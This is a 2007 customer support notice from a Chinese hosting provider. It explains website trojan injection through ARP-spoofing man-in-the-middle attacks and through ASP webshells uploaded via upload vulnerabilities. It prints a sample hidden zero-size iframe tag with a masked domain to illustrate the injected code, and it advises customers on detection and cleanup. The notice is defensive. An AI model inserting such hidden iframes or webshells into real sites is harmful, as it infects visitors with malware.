关于某些用户反映网站被挂木马的问题!

    网站挂马,有两个方法,一个是用ARP欺骗,通过arp欺骗来直接挂马,二,是利用网站程序的上传漏洞,上传ASP木马,然后再批量修改网站页面进行挂马.

    通常的arp欺骗挂马的攻击方式是在同一vlan下,控制一台服务器来进行挂马,然后再利用ARP欺骗
原理:arp中间人攻击,实际上相当于做了一次代理。
正常时候: A---->B ,B….>A.(A是访问的正常客户,B是我们的服务器,C是开展攻击的主机)
arp中间欺骗攻击时候:
客户发送请求A---->C---->B
服务器响应请求:B---->C---->A
实际上,C在这里做了一次代理的作用 
HTTP请求发过来的时候,C判断下是哪个客户端发过来的数据包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如
< iframe src = http://www.***.com/*.htm width=0 height=0 >< / iframe >的代码,那证明我们的服务器收到ARP攻击导致被挂马,请即刻联系我们处理,如果没有,那么证明我们的服务器是正常的!

网站程序的上传漏洞被上传ASP木马,这个需要联系你们网站的程序员进行网站程序的修改,我司不代为处理,修改好程序上传漏洞后,请记得清除ASP木马
另附上ASP木马在线查杀工具
http://down.chinaz.com/soft/19730.htm
如果你的Access数据库后缀名为.asp或者.asa,请记得打开查看是否也已经被植入木马.

以上网站程序漏洞修复工作,如需我司技术人员帮助处理,需酌情收取一定费用!


 

                                                                        天下数据技术部
                                                                          2007.12.28

专题活动:

天下数据13年专注海外美国服务器|香港服务器|云主机|虚拟主机租用托管以及服务器解决方案-做天下最好的IDC服务商

关于天下数据 联系我们 付款方式 网站备案 价格总览 帮助中心 诚聘英才 网站地图 相关下载

《中华人民共和国增值电信业务经营许可证》 ISP证:粤ICP备07026347号-6

朗信天下发展有限公司(控股)深圳市朗玥科技有限公司(运营)联合版权

7×24小时服务热线:4006388808 0755-83460248 7×24小时售后支持:0755-83460017

7×24小时销售热线:0755-83460032 83461241              香港服务电话:+852 67031102

深圳总部:中国.深圳市福田区车公庙苍松大厦北座13层 香港总部:香港上環蘇杭街49-51號建安商業大廈7樓

展开